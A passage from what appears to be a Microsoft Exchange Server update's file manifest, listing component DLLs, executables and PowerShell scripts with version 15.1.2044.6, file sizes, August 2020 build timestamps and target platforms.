12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.1.2044.6| 12,160| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.1.2044.6| 19,328| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.search.core.dll| 15.1.2044.6| 209,800| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.1.2044.6| 17,792| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.search.engine.dll| 15.1.2044.6| 96,640| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.1.2044.6| 16,776| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.search.fast.dll| 15.1.2044.6| 435,064| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.search.files.dll| 15.1.2044.6| 274,304| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.search.flighting.dll| 15.1.2044.6| 24,952| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.search.mdb.dll| 15.1.2044.6| 219,008| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.search.service.exe| 15.1.2044.6| 26,504| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.1.2044.6| 162,176| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.security.dll| 15.1.2044.6| 1,554,824| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.1.2044.6| 19,840| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.1.2044.6| 28,544| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.1.2044.6| 222,592| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.1.2044.6| 1,110,912| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.1.2044.6| 212,352| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.1.2044.6| 113,536| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.1.2044.6| 82,816| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.1.2044.6| 80,768| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.1.2044.6| 66,440| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.1.2044.6| 81,280| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.1.2044.6| 208,264| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.1.2044.6| 1,163,128| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.1.2044.6| 504,192| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.1.2044.6| 47,496| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.1.2044.6| 848,264| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.1.2044.6| 1,219,976| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.1.2044.6| 30,600| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.1.2044.6| 120,704| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.1.2044.6| 1,009,536| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.1.2044.6| 110,976| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.1.2044.6| 34,688| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.1.2044.6| 19,328| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.1.2044.6| 14,728| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.servicehost.exe| 15.1.2044.6| 60,800| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.1.2044.6| 50,560| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.1.2044.6| 14,200| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.1.2044.6| 14,208| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.services.common.dll| 15.1.2044.6| 74,120| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.services.dll| 15.1.2044.6| 8,490,376| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.1.2044.6| 30,080| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.1.2044.6| 633,736| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.1.2044.6| 1,651,080| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.services.json.dll| 15.1.2044.6| 296,320| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.services.messaging.dll| 15.1.2044.6| 43,392| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.1.2044.6| 233,344| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.services.surface.dll| 15.1.2044.6| 178,568| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.services.wcf.dll| 15.1.2044.6| 348,536| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.1.2044.6| 56,712| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.1.2044.6| 94,600| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.setup.common.dll| 15.1.2044.6| 297,344| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.1.2044.6| 35,712| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.setup.console.dll| 15.1.2044.6| 27,008| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.setup.gui.dll| 15.1.2044.6| 115,072| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.setup.parser.dll| 15.1.2044.6| 54,152| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.1.2044.6| 75,144| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.1.2044.6| 142,720| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.1.2044.6| 24,968| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.1.2044.6| 15,232| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.sharedcache.exe| 15.1.2044.6| 58,744| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.1.2044.6| 27,008| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.1.2044.6| 46,984| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.sqm.dll| 15.1.2044.6| 46,984| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.store.service.exe| 15.1.2044.6| 28,040| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.store.worker.exe| 15.1.2044.6| 26,496| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.1.2044.6| 13,696| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.1.2044.6| 31,616| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.storeprovider.dll| 15.1.2044.6| 1,166,720| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.structuredquery.dll| 15.1.2044.6| 158,600| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.1.2044.6| 628,104| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.1.2044.6| 13,192| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.1.2044.6| 16,256| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.1.2044.6| 13,176| 12-Aug-2020| 20:12| x64 \nMicrosoft.exchange.textprocessing.dll| 15.1.2044.6| 221,576| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.1.2044.6| 13,696| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.1.2044.6| 29,064| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.1.2044.6| 138,632| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.1.2044.6| 21,888| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.1.2044.6| 40,328| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.1.2044.6| 22,904| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.1.2044.6| 21,384| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.1.2044.6| 212,360| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.1.2044.6| 98,688| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.1.2044.6| 22,912| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.1.2044.6| 169,352| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.1.2044.6| 18,304| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.1.2044.6| 20,872| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.1.2044.6| 31,624| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.1.2044.6| 46,984| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.1.2044.6| 30,080| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.1.2044.6| 53,120| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.1.2044.6| 44,936| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.1.2044.6| 18,312| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.1.2044.6| 46,472| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.1.2044.6| 46,472| 12-Aug-2020| 20:16| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.1.2044.6| 28,024| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.common.dll| 15.1.2044.6| 457,088| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.1.2044.6| 18,312| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.1.2044.6| 30,600| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.transport.dll| 15.1.2044.6| 4,181,896| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.1.2044.6| 182,144| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.1.2044.6| 121,728| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.1.2044.6| 403,328| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.1.2044.6| 14,728| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.1.2044.6| 86,920| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.logging.dll| 15.1.2044.6| 88,960| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.1.2044.6| 68,480| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.1.2044.6| 63,368| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.1.2044.6| 430,464| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.net.dll| 15.1.2044.6| 122,240| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.1.2044.6| 17,800| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.1.2044.6| 29,064| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.1.2044.6| 60,800| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.1.2044.6| 50,048| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.1.2044.6| 33,160| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.1.2044.6| 113,032| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.1.2044.6| 18,304| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.1.2044.6| 52,096| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.storage.dll| 15.1.2044.6| 675,208| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.1.2044.6| 21,888| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.1.2044.6| 17,800| 12-Aug-2020| 20:16| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.1.2044.6| 487,304| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.1.2044.6| 306,056| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.1.2044.6| 15,736| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.1.2044.6| 46,472| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.1.2044.6| 1,044,352| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.1.2044.6| 15,240| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.1.2044.6| 18,824| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.1.2044.6| 18,824| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.um.callrouter.exe| 15.1.2044.6| 22,400| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.um.clientstrings.dll| 15.1.2044.6| 60,296| 12-Aug-2020| 20:13| x86 \nMicrosoft.exchange.um.grammars.dll| 15.1.2044.6| 211,840| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.um.lad.dll| 15.1.2044.6| 120,712| 12-Aug-2020| 20:14| x64 \nMicrosoft.exchange.um.prompts.dll| 15.1.2044.6| 214,912| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.1.2044.6| 118,656| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 15.1.2044.6| 239,496| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.1.2044.6| 925,576| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.um.umcore.dll| 15.1.2044.6| 1,468,800| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.1.2044.6| 32,648| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.1.2044.6| 41,856| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.1.2044.6| 24,960| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 15.1.2044.6| 130,440| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.1.2044.6| 15,232| 12-Aug-2020| 20:15| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.1.2044.6| 83,336| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.1.2044.6| 50,056| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.1.2044.6| 642,440| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.1.2044.6| 186,240| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.1.2044.6| 67,464| 12-Aug-2020| 20:12| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.1.2044.6| 12,680| 12-Aug-2020| 20:10| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.1.2044.6| 56,704| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.2044.6| 27,512| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.2044.6| 120,704| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.2044.6| 31,616| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.2044.6| 57,216| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.1.2044.6| 35,720| 12-Aug-2020| 20:11| x86 \nMicrosoft.exchange.webservices.dll| 15.1.2044.6| 1,054,080| 12-Aug-2020| 20:10| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.1.2044.6| 67,968| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.1.2044.6| 23,424| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.wopiclient.dll| 15.1.2044.6| 77,184| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.2044.6| 17,280| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.2044.6| 29,056| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.1.2044.6| 505,224| 12-Aug-2020| 20:14| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.2044.6| 14,720| 12-Aug-2020| 20:13| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.2044.6| 36,744| 12-Aug-2020| 20:15| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.2044.6| 66,424| 12-Aug-2020| 20:14| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.1.2044.6| 19,328| 12-Aug-2020| 20:14| x86 \nMicrosoft.filtering.dll| 15.1.2044.6| 113,024| 12-Aug-2020| 20:14| x86 \nMicrosoft.filtering.exchange.dll| 15.1.2044.6| 57,216| 12-Aug-2020| 20:14| x86 \nMicrosoft.filtering.interop.dll| 15.1.2044.6| 15,224| 12-Aug-2020| 20:14| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.2044.6| 46,976| 12-Aug-2020| 20:15| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.2044.6| 15,744| 12-Aug-2020| 20:15| x64 \nMicrosoft.forefront.filtering.common.dll| 15.1.2044.6| 23,936| 12-Aug-2020| 20:10| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.2044.6| 22,408| 12-Aug-2020| 20:10| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.2044.6| 34,688| 12-Aug-2020| 20:10| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,918| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,294| 12-Aug-2020| 20:14| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.2044.6| 1,517,960| 12-Aug-2020| 20:15| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.2044.6| 13,184| 12-Aug-2020| 20:14| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.2044.6| 33,160| 12-Aug-2020| 20:15| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.2044.6| 18,312| 12-Aug-2020| 20:11| x86 \nMicrosoft.forefront.reporting.common.dll| 15.1.2044.6| 46,456| 12-Aug-2020| 20:14| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.2044.6| 50,568| 12-Aug-2020| 20:12| x86 \nMicrosoft.isam.esent.collections.dll| 15.1.2044.6| 72,576| 12-Aug-2020| 20:15| x86 \nMicrosoft.isam.esent.interop.dll| 15.1.2044.6| 533,880| 12-Aug-2020| 20:13| x86 \nMicrosoft.managementgui.dll| 15.1.2044.6| 133,504| 12-Aug-2020| 20:15| x86 \nMicrosoft.mce.interop.dll| 15.1.2044.6| 24,448| 12-Aug-2020| 20:15| x86 \nMicrosoft.office.audit.dll| 15.1.2044.6| 123,776| 12-Aug-2020| 20:11| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.2044.6| 593,288| 12-Aug-2020| 20:14| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.2044.6| 42,368| 12-Aug-2020| 20:14| x86 \nMicrosoft.office.compliance.console.core.dll| 15.1.2044.6| 217,992| 12-Aug-2020| 20:14| x86 \nMicrosoft.office.compliance.console.dll| 15.1.2044.6| 854,920| 12-Aug-2020| 20:14| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.1.2044.6| 485,768| 12-Aug-2020| 20:12| x86 \nMicrosoft.office.compliance.core.dll| 15.1.2044.6| 413,064| 12-Aug-2020| 20:14| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.1.2044.6| 36,224| 12-Aug-2020| 20:14| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.2044.6| 84,864| 12-Aug-2020| 20:15| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.2044.6| 1,782,144| 12-Aug-2020| 20:12| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.2044.6| 49,544| 12-Aug-2020| 20:14| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.2044.6| 27,520| 12-Aug-2020| 20:15| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.2044.6| 174,984| 12-Aug-2020| 20:10| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.2044.6| 165,760| 12-Aug-2020| 20:14| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.1.2044.6| 40,328| 12-Aug-2020| 20:11| x86 \nMicrosoft.online.box.shell.dll| 15.1.2044.6| 46,464| 12-Aug-2020| 20:14| x86 \nMicrosoft.powershell.hostingtools.dll| 15.1.2044.6| 67,968| 12-Aug-2020| 20:11| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.1.2044.6| 67,968| 12-Aug-2020| 20:11| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.1.2044.6| 120,184| 12-Aug-2020| 20:15| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,126| 12-Aug-2020| 20:14| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,068| 12-Aug-2020| 20:14| Not applicable \nMovemailbox.ps1| Not applicable| 61,148| 12-Aug-2020| 20:14| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,606| 12-Aug-2020| 20:14| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,536| 12-Aug-2020| 20:14| Not applicable \nMpgearparser.dll| 15.1.2044.6| 99,720| 12-Aug-2020| 20:15| x64 \nMsclassificationadapter.dll| 15.1.2044.6| 248,704| 12-Aug-2020| 20:10| x64 \nMsexchangecompliance.exe| 15.1.2044.6| 78,712| 12-Aug-2020| 20:14| x86 \nMsexchangedagmgmt.exe| 15.1.2044.6| 25,472| 12-Aug-2020| 20:14| x86 \nMsexchangedelivery.exe| 15.1.2044.6| 38,784| 12-Aug-2020| 20:15| x86 \nMsexchangefrontendtransport.exe| 15.1.2044.6| 31,616| 12-Aug-2020| 20:14| x86 \nMsexchangehmhost.exe| 15.1.2044.6| 27,008| 12-Aug-2020| 20:15| x86 \nMsexchangehmrecovery.exe| 15.1.2044.6| 29,568| 12-Aug-2020| 20:15| x86 \nMsexchangemailboxassistants.exe| 15.1.2044.6| 72,576| 12-Aug-2020| 20:14| x86 \nMsexchangemailboxreplication.exe| 15.1.2044.6| 20,856| 12-Aug-2020| 20:14| x86 \nMsexchangemigrationworkflow.exe| 15.1.2044.6| 68,992| 12-Aug-2020| 20:15| x86 \nMsexchangerepl.exe| 15.1.2044.6| 71,040| 12-Aug-2020| 20:15| x86 \nMsexchangesubmission.exe| 15.1.2044.6| 123,264| 12-Aug-2020| 20:15| x86 \nMsexchangethrottling.exe| 15.1.2044.6| 39,808| 12-Aug-2020| 20:15| x86 \nMsexchangetransport.exe| 15.1.2044.6| 74,112| 12-Aug-2020| 20:14| x86 \nMsexchangetransportlogsearch.exe| 15.1.2044.6| 139,144| 12-Aug-2020| 20:15| x86 \nMsexchangewatchdog.exe| 15.1.2044.6| 55,680| 12-Aug-2020| 20:15| x64 \nMspatchlinterop.dll| 15.1.2044.6| 53,632| 12-Aug-2020| 20:14| x64 \nNativehttpproxy.dll| 15.1.2044.6| 91,520| 12-Aug-2020| 20:13| x64 \nNavigatorparser.dll| 15.1.2044.6| 636,808| 12-Aug-2020| 20:15| x64 \nNego2nativeinterface.dll| 15.1.2044.6| 19,336| 12-Aug-2020| 20:14| x64 \nNegotiateclientcertificatemodule.dll| 15.1.2044.6| 30,080| 12-Aug-2020| 20:12| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,268| 12-Aug-2020| 20:14| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,583| 12-Aug-2020| 20:14| Not applicable \nNtspxgen.dll| 15.1.2044.6| 80,776| 12-Aug-2020| 20:10| x64 \nOleconverter.exe| 15.1.2044.6| 173,952| 12-Aug-2020| 20:14| x64 \nOutsideinmodule.dll| 15.1.2044.6| 87,936| 12-Aug-2020| 20:10| x64 \nOwaauth.dll| 15.1.2044.6| 92,040| 12-Aug-2020| 20:12| x64 \nOwasmime.msi| Not applicable| 716,800| 12-Aug-2020| 20:10| Not applicable \nPerf_common_extrace.dll| 15.1.2044.6| 245,128| 12-Aug-2020| 20:10| x64 \nPerf_exchmem.dll| 15.1.2044.6| 85,888| 12-Aug-2020| 20:10| x64 \nPipeline2.dll| 15.1.2044.6| 1,454,472| 12-Aug-2020| 20:10| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.2044.6| 41,352| 12-Aug-2020| 20:10| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 70,999| 12-Aug-2020| 20:14| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,229| 12-Aug-2020| 20:14| Not applicable \nProductinfo.managed.dll| 15.1.2044.6| 27,008| 12-Aug-2020| 20:11| x86 \nProxybinclientsstringsdll| 15.1.2044.6| 924,544| 12-Aug-2020| 20:12| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,242| 12-Aug-2020| 20:14| Not applicable \nQuietexe.exe| 15.1.2044.6| 14,720| 12-Aug-2020| 20:15| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,540| 12-Aug-2020| 20:10| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,643| 12-Aug-2020| 20:10| Not applicable \nRemoteexchange.ps1| Not applicable| 23,561| 12-Aug-2020| 20:14| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,688| 12-Aug-2020| 20:14| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,006| 12-Aug-2020| 20:14| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,016| 12-Aug-2020| 20:14| Not applicable \nReplaycrimsonmsg.dll| 15.1.2044.6| 1,099,136| 12-Aug-2020| 20:15| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,464| 12-Aug-2020| 20:10| Not applicable \nResetcasservice.ps1| Not applicable| 21,711| 12-Aug-2020| 20:14| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,089| 12-Aug-2020| 20:10| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,145| 12-Aug-2020| 20:15| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,214| 12-Aug-2020| 